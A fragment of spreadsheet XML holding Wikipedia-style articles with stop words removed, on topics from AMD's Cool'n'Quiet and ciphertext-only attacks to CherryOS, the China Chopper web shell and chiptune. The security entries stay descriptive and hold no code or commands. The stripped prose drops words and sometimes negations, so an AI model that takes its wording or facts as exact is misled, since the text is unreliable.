operating systems free software foundation project references external links unix-like definition, linux information project (linfo) unix history history time line graph unix unix-like systems éric lévénez grokline's unix ownership history project project technical history unix unix-like systems wayback machine (archived june 2004)</t>
  </si>
  <si>
    <t>Cool'n'Quiet</t>
  </si>
  <si>
    <t>cool'n'quiet dynamic frequency scaling power saving technology introduced athlon processor line. works reducing processor's clock rate voltage processor idle. technology reduce overall power consumption lower heat generation, allowing slower (thus quieter) cooling operation. objectives cooler quieter result name cool'n'quiet. technology similar intel's speedstep amd's powernow!, developed increasing laptop battery life reducing power consumption. different usage, cool'n'quiet refers desktop server chips, powernow! used mobile chips; technologies similar identical. this technology also introduced "e-stepping" opterons, however called optimized power management, essentially re-tooled cool'n'quiet scheme designed work registered memory. cool'n'quiet fully supported linux kernel version 2.6.18 onward (using powernow-k8 driver) freebsd 6.0-current onward. implementation in-order take advantage cool'n'quiet technology microsoft's operating systems: cool'n'quiet enabled system bios windows 2000: operating systems "minimal power management" profile must active "power schemes". driver also released facilitates this. windows vista "minimum processor state" found "processor power management" "advanced power settings" lower "100%".also windows vista "power saver" power profile allows much lower power state (frequency voltage) "high performance" power state. unlike windows windows vista supports cool'n'quiet motherboards support acpi later. with earlier versions windows, processor drivers along cool'n'quiet software also need installed. latest version 1.3.2.0. third party utilities addition drivers offered amd, several motherboard manufacturers released software give user control cool quiet feature, well features processors chipsets. using applications, even control voltage explicitly. phenommsrtweaker (sourceforge link) rmclock processors supporting cool'n'quiet athlon athlon models athlon fx-53 (socket only) higher (socket 942) athlon models sempron socket 754: 3000+ higher; socket am2: 3200+ higher opteron e-stepping higher, branded optimized power management phenom versions support cool'n'quiet phenom supports cool'n'quiet apus ryzen models support cool quiet epyc also dynamic frequency scalingpower saving technologies: powernow! (laptop cpus) powertune/amd powerplay (graphics) powerxpress (multi-graphics) intel speedstep (cpus)performance boosting technologies: turbo core (cpus) intel turbo boost (cpus) references external links cool'n'quiet 2002 phenommsrtweaker custom cool'n'quiet</t>
  </si>
  <si>
    <t>Ciphertext-only attack</t>
  </si>
  <si>
    <t>cryptography, ciphertext-only attack (coa) known ciphertext attack attack model cryptanalysis attacker assumed access ciphertexts. while attacker channel providing access plaintext prior encryption, practical ciphertext-only attacks, attacker still knowledge plaintext. instance, attacker might know language plaintext written expected statistical distribution characters plaintext. standard protocol data messages commonly part plaintext many deployed systems usually guessed known efficiently part ciphertext-only attack systems. attack attack completely successful corresponding plaintexts deduced, even better, key. ability obtain information underlying plaintext beyond pre-known attacker still considered success. example, adversary sending ciphertext continuously maintain traffic-flow security, would useful able distinguish real messages nulls. even making informed guess existence real messages would facilitate traffic analysis. history cryptography, early ciphers, implemented using pen-and-paper, routinely broken using ciphertexts alone. cryptographers developed statistical techniques attacking ciphertext, frequency analysis. mechanical encryption devices enigma made attacks much difficult (although, historically, polish cryptographers able mount successful ciphertext-only cryptanalysis enigma exploiting insecure protocol indicating message settings). more advanced ciphertext-only attacks enigma mounted bletchley park world intelligently guessing plaintexts corresponding intercepted ciphertexts. modern every modern cipher attempts provide protection ciphertext-only attacks. vetting process cipher design standard usually takes many years includes exhaustive testing large quantities ciphertext statistical departure random noise. see: advanced encryption standard process. also, field steganography evolved, part, develop methods like mimic functions allow piece data adopt statistical profile another. nonetheless poor cipher usage reliance home-grown proprietary algorithms subject thorough scrutiny resulted many computer-age encryption systems still subject ciphertext-only attack. examples include: examples early versions microsoft's pptp virtual private network software used sender receiver (later versions problems). case stream cipher like used twice open ciphertext-only attack. see: stream cipher attack wired equivalent privacy (wep), first security protocol wi-fi, proved vulnerable several attacks, ciphertext-only. gsm's a5/1 a5/2 some modern cipher designs later shown vulnerable ciphertext-only attacks. example, akelarre. cipher whose space small subject brute force attack access nothing ciphertext simply trying possible keys. needed distinguish valid plaintext random noise, easily done natural languages ciphertext longer unicity distance. example des, 56-bit keys. common current examples commercial security products derive keys otherwise impregnable ciphers like user-selected password. since users rarely employ passwords anything close entropy cipher's space, systems often quite easy break practice using ciphertext. 40-bit cipher used encrypt video discs always broken method, needed look mpeg-2 video data. references alex biryukov eyal kushilevitz, from differential cryptanalysis ciphertext-only attacks, crypto 1998, pp72–88;</t>
  </si>
  <si>
    <t>CipherSaber</t>
  </si>
  <si>
    <t>ciphersaber simple symmetric encryption protocol based stream cipher. goals technical political: gives reasonably strong protection message confidentiality, designed simple enough even novice programmers memorize algorithm implement scratch. according designer, ciphersaber version qbasic programming language takes sixteen lines code. political aspect simple, reimplemented anywhere time, provides users communicate privately even government controls make distribution normal cryptographic software completely impossible. history purpose ciphersaber invented arnold reinhold keep strong cryptography hands public. many governments implemented legal restrictions cryptography, many proposed them. publicizing details secure easy-to-program encryption algorithm, reinhold hopes keep encryption technology accessible everyone. unlike programs like distributed convenient-to-use prewritten software, reinhold publishes ciphersaber specification. specification intended simple even beginning programmer implement easily. ciphersaber site explains: george lucas's star wars trilogy, jedi knights expected make light sabers. message clear: warrior confronted powerful empire bent totalitarian control must self-reliant. face real threat distribution strong cryptography, united states possibly world-wide, emulate jedi masters learning build strong cryptography programs ourselves. done, strong cryptography become impossible suppress.the site graphics file displays "cipherknight" certificate; however, file encrypted using ciphersaber known published alongside file. users view graphic (and optionally print framing) first writing ciphersaber implementation decrypt file. writing implementation performing small tasks, user becomes cipherknight decrypted certificate attests knighthood. rather providing ready-made tool, ciphersaber's designer hopes help computer users understand they're capable making strong cryptography programs without rely professional developers permission government. technical description original version ciphersaber (now called ciphersaber-1 cs1), encrypted message begins random ten-byte initialization vector (iv). this appended ciphersaber form input setup algorithm. message, xored keystream, immediately follows. fluhrer, mantin shamir attack rendered ciphersaber-1 vulnerable large number (&gt;1000) messages sent ciphersaber key. address this, ciphersaber designer made modified protocol (called ciphersaber-2) setup loop repeated multiple times recommended). addition agreeing secret key, parties communicating ciphersaber-2 must agree many times repeat loop. ciphertext output binary byte stream designed "indistinguishable random noise". communications systems accept ascii data, author recommends encoding byte stream hexadecimal digits. this less efficient than, example, base64 mime encoding, much simpler program, keeping ciphersaber's goal maximal ease implementation. security usability ciphersaber strong enough usable enough make political point effectively. however, falls markedly short security convenience would normally cryptosystem. while cipherknights ciphersaber exchange occasional messages reasonably securely, either times great distress, ciphersaber strips cryptography bare essentials offer enough features suitable wide deployment routine daily use. ciphersaber's author fact asks users download install steps becoming cipherknight. ciphersaber seen last-resort fallback system programs like banned. some, ciphersaber's sacrifices shortcomings unique rc4. ciphersaber provides message authentication. this vulnerability, shared pure stream ciphers, straightforward exploit. example, attacker knows message contains "meet jane tomorrow 3:30 particular point recover keystream point ciphertext plaintext. then attacker replace original content content exactly length, "3:30 meeting cancelled, stay home" encrypting recovered keystream, without knowing encryption key. like ciphers bulk data transfer today, ciphersaber symmetric-key cipher. thus, pair communicating users must somehow securely agree encryption key, user must securely store encryption keys communicate with. agreeing encryption keys communications channels available insecure classic chicken-and-egg problem solved public cryptography provided pgp-like programs. avoiding need secure symmetric agreements every pair users considerable convenience generally improves security. protocol typically used achieve good efficiency convenience public cipher exchange, symmetric-key cipher ciphersaber bulk data transfer using negotiated key. short key-setup used ciphersaber-1 broken: rc4's original scheduling known weak protect large number ciphertexts encrypted using key. ciphersaber-2 modifies ciphersaber-1's setup procedure repeating multiple times hope improving security (the result equivalent using conventional starting that's preprocessed complex algorithm). while procedure believed close scheduling vulnerability, effectiveness proven. like chosen-key cipher, versions ciphersaber vulnerable dictionary attack chosen (which would normally password passphrase) sufficient entropy. symmetric-key cryptography implementations usually include facility generating random keys high security required. ciphersaber site recommends generating high entropy random passphrases using diceware. like cryptosystems (including pgp), ciphersaber makes provisions prevent attackers detecting opposed decrypting) encrypted messages. this potentially serious problem situations ciphersaber designed: government banned distribution cryptographic software, probably also want pounce anyone finds sending encrypted messages. traffic analysis steganography issues countermeasures. references further reading levine, john (2000). internet secrets ed.). books. isbn 0-7645-3239-1.</t>
  </si>
  <si>
    <t>User-mode Linux</t>
  </si>
  <si>
    <t>user-mode linux (uml) architectural port linux kernel system call interface, enables multiple virtual linux kernel-based operating systems (known guests) application within normal linux system (known host). linux kernel compiled architecture boot process another linux kernel, entirely user space, without affecting host environment's configuration stability. guest normal application running process user space, approach provides user running multiple virtual linux machines single piece hardware, offering isolation, generally without affecting host environment's configuration stability. applications numerous things become possible uml. network services environment remain totally sequestered main linux system environment runs. administrators honeypots, allow test security one's computers network. serve test debug software without adversely affecting host system. also used teaching research, providing realistic linux networked environment high degree safety. environments, host guest kernel versions need match, entirely possible test "bleeding edge" version linux user-mode system running much older kernel. also allows kernel debugging performed machine, kernel debugging tools (such kgdb) require machines connected null modem cable. some hosting providers offer uml-powered virtual servers lower prices true dedicated servers. each customer root access appears system, reality physical computer shared many people. libguestfs supported backend since version 1.24 alternative using qemu kvm. integration linux kernel guest application linux binary elf) originally available patch kernel versions 2.2.x, host kernel version 2.2.x supported easily thread mode (i.e., non-skas3). linux 2.6.0, integrated main kernel source tree. method running separate kernel address space (skas) require host kernel patching implemented. this improves performance security traced thread approach, processes running share address space host's point view, leads memory inside protected memory management unit. unlike current using skas, buggy malicious software inside running non-skas host could able read memory space processes even kernel memory. comparison technologies user-mode linux generally considered lower performance competing technologies, openvz. future work adding support virtualization reduce disadvantage. often cited strength competing technology) support thread-local storage (tls). this also supported latest kernels. concentrates virtualizing whole machine, thus systems running machine really virtual machines. uml, host machine virtualized way, guest systems true virtual machines. this allows guest direct access host filesystems hardware, common host directory (e.g., /uml/root supported platforms originally designed instruction set, also ported others including ia-64 powerpc. also l4linux colinux mklinux references external links official documentation ready-made kernels running debian inside debian user-mode linux linuxzoo: online free access umls</t>
  </si>
  <si>
    <t>Check Point GO</t>
  </si>
  <si>
    <t>check point drive combines encrypted flash drive virtualization, computer security technologies turn secure corporate desktop. plugging check point port microsoft windows os-based laptop, users launch secure virtual workspace segregated host this allows users securely access company files applications remote location, including insecure host environments hotel business center internet café.check point uses hardware software encryption protect user credentials, documents, sensitive data, data cannot compromised transit event device lost. system uses authentication process enforces minimum levels password strength, well certificates security tokens multifactor authentication remote connectivity. device interfaces software corporate server support company policies security updates security gateways. history check point (formerly abra) first introduced check point software technologies ltd. sandisk corporation march 2010 address security compliance issues companies remote employees. workers increasingly demanding remote access company applications data. personal equipment accessing network pose risk corporate networks, creating potential avenue corporate data loss allowing unsecure connections.the companies cite check point system provides solution companies want employees purchase manage laptops, needing high security (including encryption) computing devices outside workplace, well contractors/vendors require access company network working site. since release, product industry awards including product 2010" computerworld named products watch” 2010 conference magazine.checkpoint went end-of-sale 31-dec-2013, support ending 31-dec-2018 technology architecture when check point inserted port user presented login screen. upon successful login, explorer.exe instance started check point secure workspace. subsequent processes started child processes explorer. check point uses software installed host applications microsoft word microsoft excel, user’s documents remain secure check point environment virtual workspace runs parallel host environment. file registry input/output calls secure application inside check point redirected flash drive. applications running check point desktop (including explorer) operate virtual file system registry. virtual files registry data instantly written flash drive immediately encrypted. currently, check point work windows workstations, incompatibility enterprise client settings. specifications awards distinguished "the best international innovation" award 2010 information security (itbn) conference hungary. received computerworld czech republic's annual product year" 2010. also check point vpn-1 circuit-level gateway comparison firewalls firewall list linux router firewall distributions packet sandbox (computer security) screened-subnet firewall unified threat management virtual firewall references</t>
  </si>
  <si>
    <t>Check Point VPN-1</t>
  </si>
  <si>
    <t>vpn-1 firewall product developed check point software technologies ltd. vpn-1 stateful firewall also filters traffic inspecting application layer. first commercially available software firewall stateful inspection. later (1997), check point registered u.s. patent 5,606,668 security technology that, among features, included stateful inspection. vpn-1 functionality currently bundled within check point's perimeter security products. product, previously known firewall-1, sold integrated firewall solution. platforms vpn-1 software installed separate operating system, provides protocol stack, file system, process scheduling features needed product. this different commercial firewall products like cisco juniper firewalls firewall software part proprietary operating system. although traditionally sold software only, vpn-1 also sold appliance form check point's utm-1 (starting 2006) power-1 appliances. appliances gaia, gaia embedded operating system. version r80, check point quantum network security supports following operating systems: check point gaia embedded based distribution appliances); check point gaia check point linux distribution, based enterprise linux, unifying ipso secureplatform single operating system);previous versions check point firewall supported operating systems including solaris, hp-ux aix, microsoft windows. table version history section details. vpn-1 running nokia platform ipso often called nokia firewall different product, fact runs vpn-1 software platforms. upon completing acquisition nokia security appliance business 2009, checkpoint started project named gaia aimed merging different operating systems—secureplatform ipso—into one. this positioned finally replace existing operating systems point future. april 2012 check point announced general availability gaia operating system part r75.40 release. features while started pure firewall product, later features added. licensed separately, since began bundled default installations vpn-1 well. smartdefense (ips) this feature adds built-in stateful inspection inherent tcp/ip protocols checks normalization inspection common application protocols. starting feature rebranded ips.quality service (floodgate-1) checkpoint implementation quality service (qos). supports bandwidth guaranteeing limiting rule connection. also priority queuing done (llq). nevertheless, based implementation, differentiated services precedence, supported content inspection starting feature introduced providing services: antivirus scanning scanning passing traffic viruses filtering limiting access internal firewall hosts resources using explicit specification category rating. also check point check point abra references external links www.checkpoint.com check point software technologies site www.fw-1.de information vpn-1 check point official forums cpug: check point user group check point ipsec implementation details</t>
  </si>
  <si>
    <t>User operation prohibition</t>
  </si>
  <si>
    <t>user operation prohibition (abbreviated uop) form restriction used video discs blu-ray discs. most players blu-ray players prohibit viewer performing large majority actions sections protected restricted feature, display symbol message effect actions attempted. used mainly copyright notices warnings, warning united states, "protected" (i.e., unskippable) commercials. countermeasures some players ignore flag, allowing user full control playback. virtually players purpose-built player hardware (for example, player program running general purpose computer) ignore flag. there also modchips available standard players purpose. flag removed ripper software decrypter, shrink, anydvd, video converter, digiarty winx ripper platinum, mactheripper, handbrake k9copy. many players, pressing stop-stop-play cause player play movie immediately, ignoring flags would otherwise make advertisements, piracy warnings trailers unskippable.nevertheless, removing always provide navigation function restricted parts dvd. this parts sometimes lacking navigation commands allow skipping menu parts dvd. this become common recent titles, order circumvent disabling many applications players offer. newer players (i.e. post-c. late 2010) have, however, designed override aforementioned counter-countermeasures. reader software inside player automatically generates chapters parts lacking navigation commands, allowing fast-forwarded skipped; pressing menu button, even previously restricted sections, cause jump main menu. also comparison ripper software copy control association hacking consumer electronics references external links user prohibited operations flag documentation, unofficial specifications u.s. patent 6,553,180 microsoft windows info, current uops, list user operations controlled flag.</t>
  </si>
  <si>
    <t>CherryOS</t>
  </si>
  <si>
    <t>cherryos powerpc processor emulator microsoft windows platforms, allowed various apple inc. programs operated windows announced made available pre-orders october 2004, developed maui x-stream (mxs), startup company based lahaina, hawaii subsidiary paradise television. program encountered number launch difficulties first year, including poorly-reviewed soft launch october 2004, wherein wired magazine argued cherryos used code grafted directly pearpc, older open-source emulator. lead developer arben kryeziu subsequently stated pearpc provided inspiration cherryos, "not work, architecture. with architecture never speed."after development, cherryos released final form march 2005, support dvd, usb, firewire, ethernet. described automatically detecting "hardware network connections" allowing "for virtually x-ready application," including safari mail. estimated compatible approximately percent pcs, fielded accusations cherryos incorporated code pearpc. argued cherryos "absolutely not" knockoff," though "certain generic code strings screen verbiage used pear also used cherryos... proprietary pear product." shortly afterwards creators pearpc reported "contemplating" litigation maui x-stream, april 2005, cherryos announced hold. later, cherryos announced "due overwhelming demand, cherry open source project launches 2005." history background development october 2004, emulator cherryos announced maui x-stream (mxs), startup company based lahaina, hawaii subsidiary paradise television. time best known developing software video streaming, particularly encoder. emulator intended allow utilized computer architecture, cherryos advertised working windows windows 2000 windows features allowing files dragged mac, creation multiple profiles, support networking sound. with development employee software developer arben kryeziu, cherryos made available pre-order website.some articles hailed cherryos potential competitor programs macwindows, irish times would later write certain groups consumers "were suspicious little-known hawaii-based outfit... could suddenly something evaded much larger firms." explaining suspicion, technica later noted emulators small developers like pearpc reputations working extremely slowly, meaning cherryos's claim operating percent host pc's speed would major breakthrough" industry. when asked star bulletin, point kryeziu denied possibility cherryos would contain code rival program like apple, macwindows, emulators.com, pearpc, stating "our lawyers looked we're clear. wrote scratch we're clean whistle."according star bulletin, suspicions cherryos might hoax "were fanned" glitches cherryos home website, three days site opened pre-sales crashed taking 300,000 daily hits. president kartes crediting crash unexpected high traffic "purists" hacked destroyed servers, though continued accept non-digital pre-orders, october cherryos website offline entirely switched host. pre-release version initially company offer trial version cherryos, citing concerns code might pirated. however, direct result overwhelming response october announcement," october company readying free beta version projected release date november 2004. october kryeziu stated free public demo would released within week, cherryos first registered trademarked united states october 2004. october however, kryeziu withheld timetable cherryos release, stating company pre-emptive releasing earlier "soft launch" version, cherryos still many software bugs predict release date. wired news reviewed pre-release version around time, reporting october expert found distinguishing "watermarks" pearpc's source code cherryos. moreover, pre-release version reviewed slow speed pearpc, though wired noted "they've actually done work they've written whole graphical interface makes [pearpc] easier use."in response article, stated edition tested wired "very bad...premature version" cherryos," cherryos programmers since fired directly grafting elements pearpc code release. competing emulator, pearpc released year general public license, allows commercial products software profit "certain conditions, acknowledging previous work." kryeziu stated pearpc provided inspiration cherryos, "not work, architecture. with architecture never speed got." argued similarities cherryos pearpc result "the fact designed perform similar functions," "there functionalities done certain way, names going similar identical." wired senior editor leander kahney posited final cherryos release contain pearpc code, pearpc would unlikely maui x-stream profits since open-source codes protected honor system legal basis." october kryeziu stated wired he'd contacted apple computer undisclosed reason "wasn't bad." cherryos release after delay, cherryos released final form march 2005. maui-x stream initially offered free copy evaluation website, boot allowances five free days copy. according president kartes, within first days free version downloaded 100,000 times. stated kartes observer march 2005, "there misinformation product... think proven skeptics wrong." initial reports certain computers encountering slow speeds glitches explained "expected," "it's bugs. that we're offering free trial download. work, it.... testing consumers improve stability performance." kartes extrapolated development, somewhere "60% owners" would able cherryos product. announced plans market cherryos throughout summer 2005, withheld specifics would released sale.betanews.com reviewed cherryos upon public release, arguing similarities cherryos pearpc, including specific non-generic lines code. maui x-stream president kartes denied cherryos grafted pearpc code, march 2005, spokesperson cherryos stated irish times cherryos "absolutely not" knockoff pear "there considerable differences products: both products emulate apple operating system similarity ends there." spokesperson explained "certain generic code strings screen verbiage used pear also used cherryos. they proprietary pear product. example, pear tops emulation cherryos stable emulator market today. cherryos uses multithreading architecture speed ease use. pear employs step-by-step approach; cherryos features shared-drive emulator, drag-and-drop option allows connect windows drive environment cherryos emulator support sound." kartes stated although pearpc introduced code cherryos, "doesn't give claim certain technical aspects product."on march 2005, technica reported creators pearpc "contemplating" litigation maui x-stream. april 2005, cherry announced developers hold "until notice." later, cherryos announced website would longer commercial product, "due overwhelming demand, cherry open source project launches 2005." trademark cherryos filed abandoned june 2006. technical features overview cherryos powerpc processor emulator microsoft windows platforms. originally written work windows windows 2000 windows among features cherry purported allow files dragged mac, creation multiple profiles, support skins, support networking sound. october 2004, program's developer announced cherryos "full network capabilities" "complete access host computer's hardware resources hard drive, cpu, ram, firewire, usb, pci, pcmcia bus, ethernet networking modem." october 2004, program reported download velocity engine included. time, stated developing acceleration cherryos.the program publicly released march 2005, support dvd, usb, firewire, ethernet. described automatically detecting "hardware network connections" allowing "for virtually x-ready application," including safari mail apple. estimated compatible approximately percent pcs, cherryos system required pentium gigahertz (ghz) equivalent hardware windows well megabytes memory gigabytes hard drive space. after initial march release, speed cherryos reported variable. karol mcguire stated speed depended computer processor, processor inadequate space hard drive runs less optimum operating speeds allow cherryos perform designed." following public launch, company announced kryeziu would overseeing development "sound support network bridging, well improving speed." kryeziu explained think we'll first issues solved fairly soon. it's type product continually updated along. think make faster right now, take time." apple year development, question press legality cherryos relation apple's "use restrictions" agreement, allows apple programs used singular "apple-labeled computer" time. publication technica notes, however, emulator [like cherryos pearpc] violating agreements bringing wrath apple legal. legitimate uses too... could emulator version linux hardware, could even network distribution linux, justifying technologies rationalization." despite fact, irish times pointed cherryos marketed exclusively osx, argued "clear" violation license agreement. versions also list computer simulation software list emulators comparison platform virtualization software references external links "cherryos goes open source" article dalrymple macworld (april 2005)</t>
  </si>
  <si>
    <t>Chgrp</t>
  </si>
  <si>
    <t>chgrp (from change group) command used unprivileged users various operating systems change group associated file system object (such computer file, directory, link) member. file system object sets access permissions, owner, group others. changing group object could used change users write file. history chgrp command originally developed part unix operating system at&amp;t bell laboratories. also available plan inferno operating systems unix-like systems. chgrp command also ported operating system. syntax chgrp [options] group group parameter specifies group files directories associated. either symbolic name identifier. specifies file system objects, result glob expression like *.conf. frequently implemented options recurse subdirectories. verbosely output names objects changed. most useful "fso" list. force forge ahead objects even error encountered. example command changes group associated file prog.conf wheel staff (provided executing user member group). this could used allow members staff modify configuration programs prog prox. also chmod chown group identifier (unix) list unix commands (unix) references external links chgrp: change file group ownership shell utilities reference, single unix specification, version open group chgrp(1) plan programmer's manual, volume chgrp(1) inferno general commands manual</t>
  </si>
  <si>
    <t>Chicane</t>
  </si>
  <si>
    <t>chicane serpentine curve road, added design rather dictated geography. chicanes extra turns used motor racing roads streets slow traffic safety. example, form chicane short, shallow s-shaped turn requires driver turn slightly left slightly right continue road, requiring driver reduce speed. word chicane derived french verb chicaner, means create difficulties" dispute pointlessly", "quibble", also root english noun chicanery. motor racing modern racing circuits, chicanes usually located long straights, making prime location overtaking. they placed tactically circuit designers prevent vehicles reaching speeds deemed unsafe. prime example three chicanes autodromo nazionale monza, introduced early 1970s; chase mount panorama, added 1987; tamburello chicane imola, placed 1995 ayrton senna's death original corner. mans 1990, chicanes placed kilometres (3.7 mulsanne straight group prototypes previously achieved speeds kilometres hour (250 mph) order conform international regulations limiting maximum length straight motor racing circuit kilometres (1.2 mi). some tracks, marina circuit dhabi, feature optional chicanes. faster cars take chicane, slower cars (such amateur club racers) avoid chicane capable reaching equally high speeds straights. circuit barcelona-catalunya europcar, became source controversy instituted motogp fatal crash. daytona international speedway, optional chicane near entrance slow vehicles safety reasons issues certain vehicles prevent brake failure entering high-speed turn splitting acceleration backstretch chicane turn sections slow vehicles down. another example tsukuba circuit japan. chicane added turn creating right turn, followed immediately left. this chicane used motorcycles. implemented divert motorcycles taking turn high-speed long sweeping left turn. turn deemed unsafe motorcycles, immediately following slow right hairpin turn. this means riders still leaning left expected begin braking turns chicanes make slipstreaming less potent break pelotons motor races.the term used types racing, bobsleigh, indicate similar shift course track. slower driver vehicle delays competitors sometimes disparaged mobile chicane moving chicane. cases move quickly enough allow competitors higher positions (having completed laps) past, despite repeated showings blue flags. this cost competitors valuable time championship points. this term, applied traffic calming, refer usage portable devices create chicane configuration. traffic calming chicanes type "horizontal deflection" used traffic calming schemes reduce speed traffic. drivers expected reduce speed negotiate lateral displacement vehicle path. there several variations traffic-calming chicanes, generally fall broad categories: single-lane working chicanes, consist staggered build-outs, narrowing road traffic direction give opposing traffic two-way working chicanes, build-outs provide deflection, lanes separated road markings central island.limited accident data chicane schemes indicate changes injury accidents (range −54% +32%) accident severity.chicanes also used prevent access certain vehicles. vermont agency transportation considered adding chicanes route stowe cambridge prevent passage tractor-trailers, often stuck road. pedestrian pedestrian chicane kind permanent fence used railway crossing slow pedestrians force observe directions crossing railway tracks. while passing chicane, turn left right, increasing probability seeing approaching train. similar arrangement sometimes used entrances parks impede bicycle, car, mobility scooter, wheelchair access. also crowd control barrier references external links media related chicanes wikimedia commons dictionary definition chicane wiktionary</t>
  </si>
  <si>
    <t>China Chopper</t>
  </si>
  <si>
    <t>china chopper shell approximately kilobytes size, first discovered 2012. this shell commonly used malicious chinese actors, including advanced persistent threat (apt) groups, remotely control servers. this shell parts, client interface executable file) receiver host file compromised server. china chopper many commands control features password brute-force attack option, code obfuscation, file database management graphical user interface. originally distributed website www.maicaidao.com down. fireeye revealed client shell programmed microsoft visual china chopper used attacks eight australian hosting providers compromised unsupported operating system (windows server 2008). hackers connected servers monero mining pool, mined 3868 worth monero.in 2021, version shell programmed jscript used advanced persistent threat group hafnium exploit four zero-day vulnerabilities microsoft exchange server, 2021 microsoft exchange server data breach. this shell dropped vulnerability exploited, allowing attackers upload program runs administrator privileges. with address .aspx file containing script, http post request made script command request, causing script execute command immediately using jscript 'eval' function, allowing attackers arbitrary code server. references</t>
  </si>
  <si>
    <t>Chipkill</t>
  </si>
  <si>
    <t>chipkill ibm's trademark form advanced error checking correcting (ecc) computer memory technology protects computer memory systems single memory chip failure well multi-bit errors portion single memory chip. simple scheme perform function scatters bits hamming code word across multiple memory chips, failure single memory chip affect word. this allows memory contents reconstructed despite complete failure chip. typical implementations advanced codes, code, correct multiple bits less overhead. chipkill frequently combined dynamic bit-steering, chip fails exceeded threshold errors), another, spare, memory chip used replace failed chip. concept similar raid, protects disk failure, except concept applied individual memory chips. technology developed corporation early middle 1990s. important feature, chipkill technology deployed primarily ssds, mainframes midrange servers. equivalent system microsystems called extended ecc, equivalent systems called advanced chipspare. similar system intel, called lockstep memory, provides double-device data correction (dddc) functionality. similar systems micron, called redundant array independent nand (rain), sandforce, called raise level protect data stored ssds single nand flash chip going bad.a 2009 paper using data google's datacentres provided evidence demonstrating observed google systems, dram errors recurrent location, dimms affected year. specifically, cases correctable error followed least correctable error month". dimms chipkill error correction showed lower fraction dimms reporting uncorrectable errors compared dimms error correcting codes correct single-bit errors. 2010 paper university rochester also showed chipkill memory gave substantially lower memory errors, using real world memory traces simulations. also memory lockstep (computing) memory protexion redundant array independent memory single-error correction double-error detection (secded) references external links intel e7500 chipset intelx4 single device data correction sddc) implementation validation, intel application note ap-726, august 2002. dram study turns assumptions errors upside down, technica, october 2009 enabling memory reliability, availability, serviceability features dell poweredge servers, 2005 chipkill correct memory architecture, august 2000, david locklear mathematics chipkill ecc, october 2015,</t>
  </si>
  <si>
    <t>Chiptune</t>
  </si>
  <si>
    <t>chiptune, also known chip music 8-bit music, style synthesized electronic music made using programmable sound generator (psg) sound chips synthesizers vintage arcade machines, computers video game consoles. term commonly used refer tracker format music intentionally sounds similar older psg-created music (this original meaning term), well music combines sounds modern musical styles. described interpretation many genres" since existing song arranged chiptune style defined choice instrument timbre specific style elements. technology waveform generator fundamental module sound synthesis system. waveform generator usually produces basic geometrical waveform fixed variable timbre variable pitch. common waveform generator configurations usually included three simple waveforms often single pseudo-random-noise generator (prng). available waveforms often included pulse wave (whose timbre varied modifying duty cycle), square wave symmetrical pulse wave producing overtones), triangle wave (which fixed timbre containing harmonics, softer square wave), sawtooth wave (which bright raspy timbre contains even harmonics). notable examples systems employing technology nintendo game portable game console commodore personal computer. game uses pulse channels (switchable 12.5%, 25%, wave duty cycle), channel 4-bit pulse-code modulation (pcm) playback, pseudo-random-noise generator. commodore however, used technology chip offered channels, switchable pulse, saw-tooth, triangle, noise. unlike game boy, pulse channels commodore allowed full control wave duty cycles. technically advanced chip, offering many features including ring modulation adjustable resonance filters.due limited number voices primitive chips, main challenges produce rich polyphonic music them. usual method emulate quick arpeggios, relevant features chiptune music (along, course, electronic timbres).some older systems featured simple beeper sound output, original spectrum despite this, many skilled programmers able produce unexpectedly rich music bare hardware, sound fully generated system's direct control beeper. history earliest precursors chip music found early history computer music. 1951, computers csirac ferranti mark used perform real-time synthesized digital music public. earliest commercial computer music albums came first philadelphia computer music festival, held august 1978, part personal computing show. first philadelphia computer music festival recordings published creative computing 1979. global program science international (1976–1979) credited pdp-11/10 music.by early 1980s, personal computers become less expensive accessible previously. this proliferation outdated personal computers game consoles abandoned consumers upgraded newer machines. they demand consumers whole, thus difficult find, making highly accessible affordable method creating sound art. while mostly underground genre, chiptune periods moderate popularity 1980s 21st century, influenced development electronic dance music. video game origins chiptune music began appear video game music produced golden video arcade games. early example opening tune tomohiro nishikado's arcade game fight (1975). first video game continuous background soundtrack tomohiro nishikado's 1978 release space invaders, four simple chromatic descending bass notes repeating loop, though dynamic interacted player, increasing pace enemies descended player. first video game feature continuous melodic background music rally-x, arcade game released namco 1980, featuring simple tune repeats continuously gameplay. also earliest games digital-to-analog converter produce sampled sounds. that year, first video game feature speech synthesis also released, sunsoft's shoot arcade game stratovox.in late 1970s, pioneering synthpop/electronic dance music group yellow magic orchestra (ymo) using computers produce synthesized music. some early music, including 1978 self-titled debut album, sampling sounds popular arcade games space invaders fight. addition incorporating sounds contemporary video games music, band would later major influence much video game chiptune music produced 8-bit 16-bit eras.sega's 1982 arcade game super locomotive, example, featured chiptune cover version ymo's "rydeen" (1979); several later computer games also covered song, trooper truck (1983) rabbit software well daley thompson's decathlon (1984) stryker's (1986) arranged martin galway. 1983, konami's arcade game gyruss utilized five sound chips along digital-to-analog converter, partly used create electronic rendition bach's toccata fugue minor. 1984, former member haruomi hosono released album produced entirely namco arcade game samples entitled video game music, early example chiptune record first video game music album. record featured work namco's chiptune composers: toshio (pac-man 1980), nobuyuki ohnogi (galaga, rally-x bosconian 1981, pole position 1982), yuriko keino (dig xevious 1982). synthesis major advance chip music introduction frequency modulation synthesis synthesis), first commercially released yamaha digital synthesizers sound chips, began appearing arcade machines early 1980s. arcade game composers utilizing synthesis time included konami's miki higashino (gradius, yie-ar kung teenage mutant ninja turtles) sega's hiroshi kawaguchi (space harrier, hang-on, run). early 1980s, significant improvements personal computer game music made possible introduction digital synthesis sound. yamaha began manufacturing synth boards japanese computers pc-8801 pc-9801 early 1980s, mid-1980s, pc-8801 fm-7 built-in sound. this allowed computer game music greater complexity simplistic beeps internal speakers. these synth boards produced "warm pleasant sound" musicians yuzo koshiro takeshi utilized produce music still highly regarded within chiptune community. early 1980s, japanese personal computers pc-88 pc-98 featured audio programming languages music macro language (mml) midi interfaces, often used produce video game music.fujitsu also released sound editor software fm-7 1985, providing users user-friendly interface create edit synthesized music.in 1987, synthesis became available western computers canadian company released adlib music synthesizer card personal computer, singapore-based creative labs incorporated adlib card's sound chip sound blaster card 1989. both cards widely supported ms-dos game developers late 1980s early 1990s. widespread adoption synthesis consoles would later major advances 16-bit era, time 16-bit arcade machines using multiple synthesis chips. major chiptune composer period yuzo koshiro. despite later advances audio technology, would continue older pc-8801 hardware produce chiptune soundtracks series streets rage (1991–1994) etrian odyssey (2007–present). soundtrack revenge shinobi (1989) featured house progressive techno compositions fused electronic dance music traditional japanese music.the soundtrack streets rage (1992) considered "revolutionary" "ahead time" "blend swaggering house synths, 